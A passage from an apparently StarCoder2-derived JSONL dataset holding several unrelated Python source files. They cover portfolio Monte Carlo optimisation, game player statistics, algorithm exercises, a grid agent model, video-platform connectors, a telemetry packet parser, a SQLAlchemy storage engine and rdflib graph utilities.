ch2.loc['Tbills','pctCh_sP500']\n\n\nmeans_ref = np.array(ch1.loc['mean',ch1.columns])\nstd_ref = np.array(ch1.loc['std',ch1.columns])\nlabels_ref = np.array(ch1.columns)\nref_cov = corr_ref*std_ref[0]*std_ref[1]\n\n\nprint(' ' , labels_ref)\nprint('mean : ' , means_ref)\nprint('std : ' , std_ref)\ntbill_ret = means_ref[1]\nsP500_ret = means_ref[0]\ntbill_risk = std_ref[1]\nsP500_risk = std_ref[0]\n\nprint('reference portfolio covariance : ', ref_cov)\n'''________________Monte Carlo Simulation_________________'''\nnumOfPortfolios = 75000\nreturns_risks = np.array([[0,0]])\nweights_hist = np.array([[0 for i in range(assets)]])\nsharpeRatios = np.array([0])\n\n\n\nreturns_risks_ref = np.array([[0,0]])\nweights_hist_ref = np.array([[0 for i in range(assets_ref)]])\nsharpeRatios_ref = np.array([0])\ncovarMat_ref = np.array(pctCh_sP500_tBills.cov())\n\n\n'''___ Monte Carlo Simulation for Optimal Portfolio calculation___'''\nfor i in range(numOfPortfolios):\n\tw = np.random.random(size=assets)\n\tw = np.absolute(w)\n\tw /= sum(w)\n\tfirst = omega.dot(w)\n\tvariance = np.dot(w, first)\n\tvolatility = np.sqrt(variance)\n\treturn_portfolio = np.dot(w,exp_returns)\n\tdiff = return_portfolio - risk_free_rate\n\tsharpeRatios = np.append(sharpeRatios, diff/volatility)\n\treturns_risks = np.append(returns_risks,\n\t\t [[return_portfolio,volatility]],\n\t\t axis=0)\n\tweights_hist = np.append(weights_hist,\n\t\t\t\t\t\t [[i for i in w]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks = np.delete(returns_risks,(0),axis=0)\n\tweights_hist = np.delete(weights_hist,(0),axis=0)\n\tsharpeRatios = np.delete(sharpeRatios,(0),axis=0)\n\tmax_sharpe = max(sharpeRatios)\n\tmax_sharpe_index = np.argmax(sharpeRatios)\n\tweights_optimal = weights_hist[max_sharpe_index]\n\n\nexp_returns_ref = np.array([sP500_ret , tbill_ret])\n\nfor i in range(numOfPortfolios):\n\tw_ref = np.random.random(size=assets_ref)\n\tw_ref = np.absolute(w_ref)\n\tw_ref /= sum(w_ref)\n\tfirst_ref = np.dot(covarMat_ref,w_ref)\n\tvariance_ref = np.dot(w_ref, first_ref)\n\tvolatility_ref = np.sqrt(variance_ref)\n\treturn_portfolio_ref = np.dot(w_ref,exp_returns_ref)\n\tdiff_ref = return_portfolio_ref - risk_free_rate\n\tsharpeRatios_ref = np.append(sharpeRatios_ref, diff_ref/volatility_ref)\n\treturns_risks_ref = 
np.append(returns_risks_ref,\n\t\t [[return_portfolio_ref, volatility_ref]],\n\t\t axis=0)\n\tweights_hist_ref = np.append(weights_hist_ref,\n\t\t\t\t\t\t [[i for i in w_ref]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks_ref = np.delete(returns_risks_ref,(0),axis=0)\n\tweights_hist_ref = np.delete(weights_hist_ref,(0),axis=0)\n\tsharpeRatios_ref = np.delete(sharpeRatios_ref,(0),axis=0)\n\tmax_sharpe_ref = max(sharpeRatios_ref)\n\tmax_sharpe_index_ref = np.argmax(sharpeRatios_ref)\n\tweights_optimal_ref = weights_hist_ref[max_sharpe_index_ref]\n\n\n\t\nprint('\\n \\n')\n\nprint('the maximum sharpe ratio is : ', max_sharpe)\nprint('optimal returns & risk : ' , returns_risks[max_sharpe_index])\nreturn_risk_opt = returns_risks[max_sharpe_index]\nreturn_risk_refOpt = returns_risks_ref[max_sharpe_index_ref]\n\nprint('\\n')\nw1_ref_port = returns_risks[max_sharpe_index,0]/tbill_ret\nprint(str(returns_risks[max_sharpe_index,0])+'/'+str(tbill_ret))\nprint('\\n')\nprint('The reference portfolio needs a '+str(w1_ref_port)+' times greater investment to match our portfolio\\'s return')\nprint('\\n')\nrisk_ref = w1_ref_port*tbill_risk\nriskComparison_port2ref = returns_risks[max_sharpe_index,1]/risk_ref\nprint('Our portfolio is '+str(riskComparison_port2ref)+' times risker than the reference portfolio')\nprint(str(returns_risks[max_sharpe_index,1])+'/'+str(risk_ref))\n\nprint('\\n \\n')\nprint('the maximum sharpe ratio for ref portfolio is : ', max_sharpe_ref)\nprint('optimal returns & risk for ref portfolio is : ' , returns_risks_ref[max_sharpe_index_ref])\nprint('weights for optimal ref portfolio are : ' , weights_optimal_ref)\nprint('\\n \\n ')\nprint('comparing sharpe ratios : ' , max_sharpe , max_sharpe_ref )\n\n\n\nportfolio_pctChange = asset_pctChange.dot(weights_optimal)\nportfolio_pctChange_ref = np.array(pctCh_sP500_tBills['Tbills']*w1_ref_port)\n\ndf_pctCh_Optport_ref = pd.DataFrame({'Opt Pf Pct Change' : portfolio_pctChange ,\n\t 'Ref Pf Pct Change' : portfolio_pctChange_ref})\n\n\nsharpe_ratio_ref_m = (return_risk_opt[0]-risk_free_rate)/risk_ref\n\n\ndf_corr_portRef = df_pctCh_Optport_ref.corr()\ndf_covMat_portRef = df_pctCh_Optport_ref.cov()\ncorrelation_OptPort_ref = df_corr_portRef.loc['Opt Pf Pct Change' , 'Ref Pf Pct Change']\n\n\ndf_weights_optimal = pd.DataFrame({'optimal port weights' : weights_optimal})\ndf_weights_optimal_ref = pd.DataFrame({'optimal ref_port weights' : weights_optimal_ref})\n\ndf_return_risk_opt = pd.DataFrame({'optimal portfolio' : np.append(return_risk_opt,max_sharpe),\n\t 'ref optimal portfolio' : np.append(return_risk_refOpt,max_sharpe_ref),\n\t 'ref retMatch portfolio' : [return_risk_opt[0], risk_ref, sharpe_ratio_ref_m ]},\n\t index = ['return','risk','sharpe ratio'] )\n\ndf_misc = pd.DataFrame({ 'Others' : [correlation_OptPort_ref , w1_ref_port , riskComparison_port2ref] },\n\t index = ['corr OptPort & Ref_m' , 'return scale OptPort/refPort', 'risk scale OptPort/refPort'])\n\ndf_corr_portRef.to_csv('corr_matrix_optPort_ref_m.csv')\ndf_covMat_portRef.to_csv('VaCov_mat_optPort_ref_m.csv')\ndf_weights_optimal.to_csv('optPort_weights.csv')\ndf_weights_optimal_ref.to_csv('optRef_weights.csv')\ndf_misc.to_csv('misc.csv')\ndf_return_risk_opt.to_csv('ret_risk_sharpe_optPort_optref_mref.csv')\n\n\nprint(df_return_risk_opt)\n\nx = np.linspace(0, 0.4, numOfPortfolios)\nx2 = np.linspace(0, 0.05, numOfPortfolios)\n\nplt.plot(x, max_sharpe*x + risk_free_rate,label='Our Capital Market Line' ,color='black')\nplt.plot(x2, max_sharpe_ref*x2 + risk_free_rate,label='ref 
Capital Market Line' ,color='green')\n\n\n\nplt.scatter(return_risk_opt[1],\n\t\t\treturn_risk_opt[0],\n\t\t\tlabel='Optimal Portfolio',\n\t\t\tc='c',\n\t\t\tmarker='x',\n\t\t\ts=200)\nplt.scatter(returns_risks[:,1],\n\t returns_risks[:,0],\n\t label='BitCoin Portfolio Frontier',\n\t c='r',\n\t marker='o')\nplt.scatter(returns_risks_ref[:,1],\n\t returns_risks_ref[:,0],\n\t label='Reference Portfolio Frontier',\n\t c='b',\n\t marker='o')\n\n\nplt.xlabel('Risk')\nplt.ylabel('Expected Return')\nplt.legend(loc=4, prop={'size': 12})\nplt.title('Efficient Frontiers')\nprint(return_risk_opt)\nplt.show()\n\n\n\n","sub_path":"Optimal_port.py","file_name":"Optimal_port.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"165899846","text":"#!/usr/bin/env python3\nfrom chiller_essential import *\nimport datetime\n\naPlayers=[]\n\ndef CalcKD(k, d):\n if k == 0:\n return str(0)\n if d == 0:\n return str(k)\n return str(\"%.2f\" % (k / d))\n\ndef BestTime(t1, t2):\n t = min(t1,t2)\n if t == 0:\n return max(t1, t2) #if no time yet --> set the highest\n return t #if captured already use lowest time\n\ndef A_Best(a1, a2):\n if a1 == \"\":\n return a2\n elif a2 == \"\":\n return a1\n if a1 < a2:\n return a1 # use oldest time\n return a2\n\nclass Player:\n #def __init__(self, name, time=0.0, spree=0, team=\"\", a_haxx0r = \"\", a_blazeit = \"\", a_satan = \"\", a_virgin = \"\"):\n def __init__(self, name, time=0.0, spree=0, team=\"\"):\n self.name = name\n self.kills = 0\n self.deaths = 0\n self.flag_grabs = 0\n self.flag_caps_red = 0\n self.flag_caps_blue = 0\n self.flag_time = time\n self.flagger_kills = 0\n self.best_spree = spree\n self.wins = 0\n self.looses = 0\n self.a_haxx0r = \"\"\n self.a_blazeit = \"\"\n self.a_satan = \"\"\n self.a_virgin = \"\"\n '''\n self.a_haxx0r = a_haxx0r\n self.a_blazeit = a_blazeit\n self.a_satan = a_satan\n self.a_virgin = a_virgin\n '''\n #round variables (not saved)\n self.killingspree = 0\n self.IsFlagger = False\n self.team = team\n self.LastChat = datetime.datetime.now()\n self.MuteScore = 0\n self.IsMuted = False\n def __add__(self, other):\n tmp_player = Player(self.name)\n tmp_player.kills = self.kills + other.kills\n tmp_player.deaths = self.deaths + other.deaths\n tmp_player.flag_grabs = self.flag_grabs + other.flag_grabs\n tmp_player.flag_caps_red = self.flag_caps_red + other.flag_caps_red\n tmp_player.flag_caps_blue = self.flag_caps_blue + other.flag_caps_blue\n tmp_player.flag_time = BestTime(self.flag_time, other.flag_time)\n tmp_player.flagger_kills = self.flagger_kills + other.flagger_kills\n tmp_player.best_spree = max(self.best_spree, other.best_spree)\n tmp_player.wins = self.wins + other.wins\n tmp_player.looses = self.looses + other.looses\n tmp_player.a_haxx0r = A_Best(self.a_haxx0r, other.a_haxx0r)\n tmp_player.a_blazeit = A_Best(self.a_blazeit, other.a_blazeit)\n tmp_player.a_satan = A_Best(self.a_satan, other.a_satan)\n tmp_player.a_virgin = A_Best(self.a_virgin, other.a_virgin)\n \"\"\"\n say(\"== merging '\" + other.name + \"' -> into -> '\" + self.name + \"' ===\")\n say(\"src: \")\n say(\"k/d: \" + str(other.kills) + \" g/r/b/t: \" + str(other.flag_grabs) + \"/\" + str(other.flag_caps_red) + \"/\" + str(other.flag_caps_blue) + \"/\" + str(other.flag_time))\n say(\"dst: \")\n say(\"k/d: \" + str(self.kills) + \" g/r/b/t: \" + str(self.flag_grabs) + \"/\" + str(self.flag_caps_red) + \"/\" + str(self.flag_caps_blue) + \"/\" + str(self.flag_time))\n say(\"merge: \")\n say(\"k/d: \" + str(tmp_player.kills) + \" g/r/b/t: \" + str(tmp_player.flag_grabs) + \"/\" + str(tmp_player.flag_caps_red) + \"/\" + str(tmp_player.flag_caps_blue) + \"/\" + str(tmp_player.flag_time))\n \"\"\"\n return tmp_player\n def ShowStats(self):\n say(\"[stats] '\" + str(self.name) + \"' kills: \" + str(self.kills) + \" deaths: \" + str(self.deaths) + \" killingspree: \" + str(self.best_spree))\n #say(\"[stats] '\" + self.name + \"' flagtime: \" + str(self.flag_time))\n def ShowStatsRound(self):\n say(\"[round-stats] '\" + str(self.name) + \"' kd: \" + CalcKD(self.kills,self.deaths) + \" (\" + str(self.kills) + \"/\" + str(self.deaths) + 
\")\")\n\n","sub_path":"src/base_player.py","file_name":"base_player.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"499461046","text":"# -*- coding:utf-8 -*-\nclass Solution1:\n def cutRope(self, number):\n # write code here\n if number<=1:\n return 0\n elif number ==2:\n return 1\n elif number == 3:\n return 2\n\n products = [0,1,2,3]\n for i in range(4,number+1):\n max= 0\n for j in range(1,int(i/2)+1):\n product = products[j]*products[i-j]\n if product > max:\n max= product\n\n products.append(max)\n\n return max\n\n\nclass Solution2:\n def cutRope(self, number):\n # write code here\n if number<=1:\n return 0\n elif number ==2:\n return 1\n elif number == 3:\n return 2\n\n threetimes = int(number/3)\n if(number%3==1):\n threetimes -=1\n\n twotimes = int((number - threetimes*3)/2)\n\n max = pow(3,threetimes)*pow(2,twotimes)\n return max\n\nif __name__ == \"__main__\":\n solution1 = Solution2()\n a = solution1.cutRope(8)\n print(a)\n","sub_path":"py-project/Solution14 2.py","file_name":"Solution14 2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"131142097","text":"# 282. Expression Add Operators\n# https://leetcode.com/problems/expression-add-operators/description/\n\n# Solution: DFS\n# 1)For every position between 2 digits, there are 4 possibilities:\n# no operator; operator +, operator -, operator *\n# Try all of them \n# 2) if using python: eval result string directly to get value,\n# if not using python, eval on the go, special care to operator *.\n# 3) special care to digit 0, since 0 can't be starting digit for num except for 0\n\nOPS = ['+', '-', '*']\n\ndef constructExpression(num, ops):\n ans = []\n for i in xrange(len(num)):\n ans.append(ops[i])\n ans.append(num[i])\n\n return ''.join(ans)\n\ndef generateOperators(num, target, ops, pos, zero_start, ans):\n if pos == len(num):\n expression = constructExpression(num, ops)\n res = eval(expression)\n if res == target:\n ans.append(expression)\n return\n\n # don't insert op\n if not zero_start:\n ops[pos] = ''\n generateOperators(num, target, ops, pos+1, False, ans)\n\n # insert op\n zero_start = num[pos] == '0'\n for op in OPS:\n ops[pos] = op\n generateOperators(num, target, ops, pos+1, zero_start, ans)\n\n return\n\nclass Solution(object):\n def addOperators(self, num, target):\n \"\"\"\n :type num: str\n :type target: int\n :rtype: List[str]\n \"\"\"\n if len(num) == 0:\n return []\n\n ops = [''] * len(num)\n ans = []\n\n zero_start = num[0] == '0'\n generateOperators(num, target, ops, 1, zero_start, ans)\n\n return ans\n\ns = Solution()\nans = s.addOperators(\"123456789\", 45)\nprint(ans)\n ","sub_path":"282.py","file_name":"282.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"46197257","text":"import constants\nfrom random import randint, shuffle\nfrom agent import Agent\n\n\nclass GridModel(object):\n\n def __init__(self):\n self.agents = []\n\n def update(self):\n indices = list(range(len(self.agents)))\n shuffle(indices)\n for index in indices: # update agents in random order\n agent = self.agents[index]\n agent.set_neighbors(self.check_neighbors(agent.x, agent.y))\n if agent.current_activity == constants.SEARCH_AGENT:\n agent.set_dir(self.find_path(agent))\n agent.update(self.get_random_target(index))\n\n def get_random_target(self, agent_idx):\n target_idx = randint(0, (len(self.agents) - 1))\n while target_idx == agent_idx:\n target_idx = randint(0, (len(self.agents) - 1))\n return self.agents[target_idx]\n\n def check_neighbors(self, x, y):\n dirs = [None, None, None, None]\n dirs[constants.NORTH] = self.agent_at(x, y - 1)\n dirs[constants.EAST] = self.agent_at(x + 1, y)\n dirs[constants.SOUTH] = self.agent_at(x, y + 1)\n dirs[constants.WEST] = self.agent_at(x - 1, y)\n return dirs\n\n def agent_at(self, x, y):\n for agent in self.agents:\n if agent.x == x and agent.y == y:\n return agent\n return None\n\n def get_number_of_agents(self):\n return len(self.agents)\n\n def add_agent(self, id, no_agents):\n x = randint(0, constants.TILES_X - 1)\n y = randint(0, constants.TILES_Y - 1)\n self.agents.append(Agent(x, y, id, no_agents))\n\n def find_path(self, agent):\n start = (agent.x, agent.y)\n end = (agent.target_agent.x, agent.target_agent.y)\n\n explored = []\n queue = [start]\n levels = {}\n levels[start] = 0\n visited = [start]\n\n while queue:\n pos = queue.pop(0)\n x = pos[0]\n y = pos[1]\n explored.append(pos)\n neighbours = [(x, y-1), (x+1, y), (x, y+1), (x-1, y)]\n for neighbour in neighbours:\n if neighbour[0] < 0 or neighbour[0] >= constants.TILES_X or neighbour[1] < 0 or neighbour[1] \\\n >= constants.TILES_Y:\n continue\n if self.agent_at(neighbour[0], neighbour[1]) and not neighbour == end:\n continue\n if neighbour not in visited:\n queue.append(neighbour)\n visited.append(neighbour)\n\n levels[neighbour] = levels[pos] + 1\n\n print(levels[start])\n print(levels[end])\n\n\n\n","sub_path":"gridmodel.py","file_name":"gridmodel.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"510770218","text":"from functools import partial\n\nfrom commonspy.logging import log_info\n\nfrom connector import config\nfrom connector.facebook import upload_video_to_facebook, update_video_on_facebook, unpublish_video_on_facebook, \\\n delete_video_on_facebook\nfrom connector.youtube_mcn import upload_video_to_youtube_mcn, delete_video_on_youtube_mcn, unpublish_video_on_youtube_mcn, \\\n update_video_on_youtube_mcn\nfrom connector.youtube_direct import upload_video_to_youtube_direct, delete_video_on_youtube_direct, \\\n unpublish_video_on_youtube_direct, update_video_on_youtube_direct\n\n\ndef test_mode_action(action, video, registry):\n log_info(\"DRY MODE action: '%s' | video: %s | registry: %s\" % (action, video.__dict__, registry.__dict__))\n\nregistered_platforms = {\n 'facebook': {\n 'upload': upload_video_to_facebook,\n 'update': update_video_on_facebook,\n 'unpublish': unpublish_video_on_facebook,\n 'delete': delete_video_on_facebook\n },\n 'youtube': {\n 'upload': upload_video_to_youtube_mcn,\n 'update': update_video_on_youtube_mcn,\n 'unpublish': unpublish_video_on_youtube_mcn,\n 'delete': delete_video_on_youtube_mcn\n },\n 'youtube_direct': {\n 'upload': upload_video_to_youtube_direct,\n 'update': update_video_on_youtube_direct,\n 'unpublish': unpublish_video_on_youtube_direct,\n 'delete': delete_video_on_youtube_direct\n }\n }\n\ntest_mode_platforms = {\n 'facebook': {\n 'upload': partial(test_mode_action, 'facebook upload'),\n 'update': partial(test_mode_action, 'facebook update'),\n 'unpublish': partial(test_mode_action, 'facebook unpublish'),\n 'delete': partial(test_mode_action, 'facebook delete')\n },\n 'youtube': {\n 'upload': partial(test_mode_action, 'youtube upload'),\n 'update': partial(test_mode_action, 'youtube update'),\n 'unpublish': partial(test_mode_action, 'youtube unpublish'),\n 'delete': partial(test_mode_action, 'youtube delete')\n },\n 'youtube_direct': {\n 'upload': partial(test_mode_action, 'youtube_direct upload'),\n 'update': partial(test_mode_action, 'youtube_direct update'),\n 'unpublish': partial(test_mode_action, 'youtube_direct unpublish'),\n 'delete': partial(test_mode_action, 'youtube_direct delete')\n }\n}\n\nclass PlatformInteraction(object):\n def __init__(self):\n if config.property('test_mode'):\n self.registered_platforms = test_mode_platforms\n else:\n self.registered_platforms = registered_platforms\n\n def execute_platform_interaction(self, platform, interaction, video, registry_model):\n if platform in self.registered_platforms and interaction in self.registered_platforms[platform]:\n self.registered_platforms[platform][interaction](video, registry_model)\n else:\n raise Exception('Target platform %s with interaction %s does not exist!')\n","sub_path":"connector/platforms.py","file_name":"platforms.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"496074619","text":"\nimport datetime\nimport time\nimport os\n\nfrom CCITT_CRC16 import CRCfromString\n\n\nclass BIRDpacket(object):\n def __init__(self, strin, filename):\n \"\"\"\n given a line in a string input it as a packet\n \"\"\"\n dt = datetime.datetime.strptime(os.path.basename(filename)[0:10], '%Y-%m-%d')\n hour, minute, second, millisecond = strin.split(' - ')[0].split(':')\n self.grt = datetime.datetime(dt.year, dt.month, dt.day, int(hour),\n int(minute), int(second), int(millisecond)*100)\n self.raw = strin.split(' - ')[1]\n self.srcid = self.raw.split()[1:3]\n self.destid = self.raw.split()[3:5]\n self.cmd_tlm = self.raw.split()[5]\n self.funid = self.raw.split()[6]\n self.seqnum = self.raw.split()[7] # number of pages in request\n self.seqidx = self.raw.split()[8] # counts up to self.seqnum \n self.pktnum = self.raw.split()[9] # packet within page, goes up to 0x13 for each page (last could end early)\n self.datalen = self.raw.split()[10] # can be sorted for the last packet in a page\n self.data = self.raw.split()[11:11+int(self.datalen,16)]\n self.crc = self.raw.split()[11+int(self.datalen, 16):11+int(self.datalen, 16)+2]\n self.valid_crc = self._crc_valid()\n\n def __eq__(self, other):\n attrs = ['data', 'srcid', 'destid']\n for a in attrs:\n if getattr(self, a) != getattr(other, a):\n return False\n return True\n \n def _crc_valid(self):\n \"\"\"\n if the calcuated CRC matches what is in the packet True, False otherwise\n \"\"\"\n calc_crc = CRCfromString(' '.join(self.raw.split(' ')[1:-3])).upper()\n if calc_crc[2:4].upper() == self.crc[0].upper() and \\\n calc_crc[4:6].upper() == self.crc[1].upper():\n return True\n else:\n return False\n\n def __str__(self):\n return('BIRDpacket: GRT: {0} Len:{1}'.format(self.grt.isoformat(), int(self.datalen, 16)))\n\n __repr__ = __str__\n\n\nclass BIRDpackets(list):\n \"\"\"\n make a list of all the BIRDpacket instances in a file\n \"\"\"\n def __init__(self, infile):\n \"\"\"\n given a filename parse into many BIRDpacket instances\n \"\"\"\n super(BIRDpackets, self).__init__()\n with open(infile, 'r') as fp:\n dat = fp.readlines()\n dat = [v.strip() for v in dat]\n self.filename = infile\n # make this class a list of BIRDpacket objects\n self.extend([BIRDpacket(v, self.filename) for v in dat])\n \n def __str__(self):\n return(\"{0} packets: {1} bad CRC\".format(len(self), int(sum([v.valid_crc for v in self if not v.valid_crc]))))\n\n __repr__ = __str__\n","sub_path":"L0toL1/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"115858828","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage database storage for hbnb clone\"\"\"\nimport MySQLdb\nfrom sqlalchemy.orm import sessionmaker, scoped_session, Session\nfrom models.base_model import BaseModel, Base\nimport os\nfrom sqlalchemy.engine import create_engine\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\n\n\nclass DBStorage:\n \"\"\"class DBStorage\"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n \"\"\"__init__\"\"\"\n username = os.getenv('HBNB_MYSQL_USER')\n password = os.getenv('HBNB_MYSQL_PWD')\n host = os.getenv('HBNB_MYSQL_HOST')\n database = os.getenv('HBNB_MYSQL_DB')\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'.format(\n username, password, host, database), pool_pre_ping=True)\n if os.getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\"Returns a dictionary of models currently in storage\"\"\"\n classes = {\n 'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity,\n 'Review': Review\n }\n result = {}\n if cls in classes:\n objs = self.__session.query(classes[cls]).all()\n for obj in objs:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n elif cls is None:\n for clas in classes:\n query = self.__session.query(classes[clas]).all()\n for obj in query:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n return result\n\n def new(self, obj):\n \"\"\"new\"\"\"\n if obj:\n self.__session.add(obj)\n\n def save(self):\n \"\"\"save\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete\"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\"reload\"\"\"\n Base.metadata.create_all(self.__engine)\n X = sessionmaker(bind=self.__engine, expire_on_commit=False)\n Session = scoped_session(X)\n self.__session = Session()\n\n def close(self):\n \"\"\"close\"\"\"\n self.__session.remove()","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"517857640","text":"#!/usr/bin/env python\n\"\"\"\nCompute expression in the defined landing intervals associated with counting units\n\"\"\"\n\nimport sys\nimport optparse\nfrom maps.exp import DGE\n\n################################################################################\n\ndef process_command_line(argv):\n if argv is None:\n argv = sys.argv[1:]\n \n usage = \"%s\\nusage: prog [options] f_read f_gtf\" % __doc__\n parser = optparse.OptionParser(usage, \n formatter=optparse.TitledHelpFormatter(width=178),\n add_help_option=True)\n \n parser.add_option(\"-t\", \"--type\", type=\"string\", dest=\"featuretype\",\n default = \"exon\", help = \"feature type (3rd column in GTF file)[exon]\")\n \n parser.add_option(\"-u\", \"--unit\", type=\"string\", dest=\"unit\",\n default = \"transcript_id\", help = \"GTF attribute as counting unit[transcript_id]\")\n\n parser.add_option(\"-o\", \"--outfile\", type=\"string\", dest=\"outfile\",\n help = \"out file name\")\n\n (options, args) = parser.parse_args()\n \n if len(args) != 2:\n parser.error('No required parameters')\n \n return options, args\n\n################################################################################\n\ndef main():\n options, args = process_command_line(None)\n f_read = args[0]\n f_gtf = args[1]\n \n dge = DGE(f_read, f_gtf, feature_type=options.featuretype, \n id_feature = \"gene_id\", id_count=options.unit)\n\n outhandle = sys.stdout\n if options.outfile:\n outhandle = open(options.outfile, \"w\")\n \n dge.count(outhandle)\n \n if options.outfile:\n outhandle.close()\n \n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/land2exp.py","file_name":"land2exp.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"355883243","text":"from __future__ import print_function\nimport sqlite3\nimport hashlib\nfrom rdflib import URIRef, Literal, Graph, Namespace, ConjunctiveGraph\nfrom rdflib.namespace import RDFS, RDF, NamespaceManager\nfrom datetime import datetime as DT\nimport datetime\nimport transaction\nimport os\nimport traceback\nimport logging\nfrom .utils import grouper\nfrom .configure import Configureable, Configure, ConfigValue\n\n__all__ = [\n \"Data\",\n \"DataUser\",\n \"RDFSource\",\n \"SerializationSource\",\n \"TrixSource\",\n \"SPARQLSource\",\n \"SleepyCatSource\",\n \"DefaultSource\",\n \"ZODBSource\"]\n\nL = logging.getLogger(__name__)\n\n\n_B_UNSET = object()\n\n\nclass _B(ConfigValue):\n\n def __init__(self, f):\n self.v = _B_UNSET\n self.f = f\n\n def get(self):\n if self.v is _B_UNSET:\n self.v = self.f()\n\n return self.v\n\n def invalidate(self):\n self.v = None\n\n def __repr__(self):\n if self.v is _B_UNSET:\n return 'Thunk of ' + repr(self.f)\n return repr(self.v)\n\n\nZERO = datetime.timedelta(0)\n\n\nclass _UTC(datetime.tzinfo):\n\n \"\"\"UTC\"\"\"\n\n def utcoffset(self, dt):\n return ZERO\n\n def tzname(self, dt):\n return \"UTC\"\n\n def dst(self, dt):\n return ZERO\n\n\nutc = _UTC()\n\n\nclass DataUser(Configureable):\n\n \"\"\" A convenience wrapper for users of the database\n\n Classes which use the database should inherit from DataUser.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DataUser, self).__init__(*args, **kwargs)\n self.__base_namespace = None\n\n @property\n def base_namespace(self):\n if self.__base_namespace is not None:\n return self.__base_namespace\n return self.conf['rdf.namespace']\n\n @base_namespace.setter\n def base_namespace(self, value):\n self.__base_namespace = value\n\n @property\n def rdf(self):\n return self.conf['rdf.graph']\n\n @property\n def namespace_manager(self):\n return self.conf.get('rdf.namespace_manager', None)\n\n def _remove_from_store(self, g):\n # Note the assymetry with _add_to_store. You must add actual elements, but deletes\n # can be performed as a query\n for group in grouper(g, 1000):\n temp_graph = Graph()\n for x in group:\n if x is not None:\n temp_graph.add(x)\n else:\n break\n s = \" DELETE DATA {\" + temp_graph.serialize(format=\"nt\") + \" } \"\n L.debug(\"deleting. s = \" + s)\n self.conf['rdf.graph'].update(s)\n\n def _add_to_store(self, g, graph_name=False):\n if self.conf['rdf.store'] == 'SPARQLUpdateStore':\n # XXX With Sesame, for instance, it is probably faster to do a PUT over\n # the endpoint's rest interface. 
Just need to do it for some common\n # endpoints\n\n try:\n gs = g.serialize(format=\"nt\")\n except Exception:\n gs = _triples_to_bgp(g)\n\n if graph_name:\n s = \" INSERT DATA { GRAPH \" + graph_name.n3() + \" {\" + gs + \" } } \"\n else:\n s = \" INSERT DATA { \" + gs + \" } \"\n L.debug(\"update query = \" + s)\n self.conf['rdf.graph'].update(s)\n else:\n gr = self.conf['rdf.graph']\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n for x in g:\n gr.add(x)\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n\n # infer from the added statements\n # self.infer()\n\n def infer(self):\n \"\"\" Fire FuXi rule engine to infer triples \"\"\"\n\n from FuXi.Rete.RuleStore import SetupRuleStore\n from FuXi.Rete.Util import generateTokenSet\n from FuXi.Horn.HornRules import HornFromN3\n # fetch the derived object's graph\n semnet = self.rdf\n rule_store, rule_graph, network = SetupRuleStore(makeNetwork=True)\n closureDeltaGraph = Graph()\n network.inferredFacts = closureDeltaGraph\n # build a network of rules\n for rule in HornFromN3('testrules.n3'):\n network.buildNetworkFromClause(rule)\n # apply rules to original facts to infer new facts\n network.feedFactsToAdd(generateTokenSet(semnet))\n # combine original facts with inferred facts\n for x in closureDeltaGraph:\n self.rdf.add(x)\n\n def add_reference(self, g, reference_iri):\n \"\"\"\n Add a citation to a set of statements in the database\n\n :param triples: A set of triples to annotate\n \"\"\"\n new_statements = Graph()\n ns = self.conf['rdf.namespace']\n for statement in g:\n statement_node = self._reify(new_statements, statement)\n new_statements.add(\n (URIRef(reference_iri),\n ns['asserts'],\n statement_node))\n\n self.add_statements(g + new_statements)\n\n def retract_statements(self, graph):\n \"\"\"\n Remove a set of statements from the database.\n\n :param graph: An iterable of triples\n \"\"\"\n self._remove_from_store_by_query(graph)\n\n def _remove_from_store_by_query(self, q):\n s = \" DELETE WHERE {\" + q + \" } \"\n L.debug(\"deleting. 
